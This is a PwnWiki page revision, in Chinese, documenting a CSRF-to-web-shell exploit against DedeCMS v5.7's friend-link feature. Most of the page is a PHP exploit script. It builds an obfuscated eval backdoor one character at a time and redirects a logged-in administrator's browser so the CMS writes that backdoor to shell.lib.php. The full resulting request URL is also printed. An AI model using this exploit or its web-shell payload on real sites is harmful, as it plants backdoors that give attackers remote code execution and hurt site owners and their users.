Difference between revisions of "DedeCMS v5.7 友情鏈接CSRF GetShell漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞利用== </translate> 700px 700px <translate> <code>dedecms_csrf.php</code> 的內容如下:...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:1--> |
</translate> | </translate> | ||
| Line 12: | Line 12: | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
<code>dedecms_csrf.php</code> 的內容如下: | <code>dedecms_csrf.php</code> 的內容如下: | ||
</translate> | </translate> | ||
| Line 30: | Line 31: | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
管理員: | 管理員: | ||
</translate> | </translate> | ||
| Line 38: | Line 40: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
由於友鏈中使用了header 跳轉,所以結果其實是訪問了<pre>http://localhost/DedeCMS/DedeCMS-V5.7-GBK-SP2-20170315/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?%3E&filename=shell.lib.php</pre> 請求。 | 由於友鏈中使用了header 跳轉,所以結果其實是訪問了<pre>http://localhost/DedeCMS/DedeCMS-V5.7-GBK-SP2-20170315/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?%3E&filename=shell.lib.php</pre> 請求。 | ||
</translate> | </translate> | ||
Latest revision as of 10:25, 10 April 2021
漏洞利用
dedecms_csrf.php 的內容如下:
<?php
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
$muma = '<'.'?'.'@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'c'.'\''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
header("location: ".$url);
exit();
管理員:
由於友鏈中使用了header 跳轉,所以結果其實是訪問了
http://localhost/DedeCMS/DedeCMS-V5.7-GBK-SP2-20170315/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?%3E&filename=shell.lib.php
請求。
shell.lib.php:
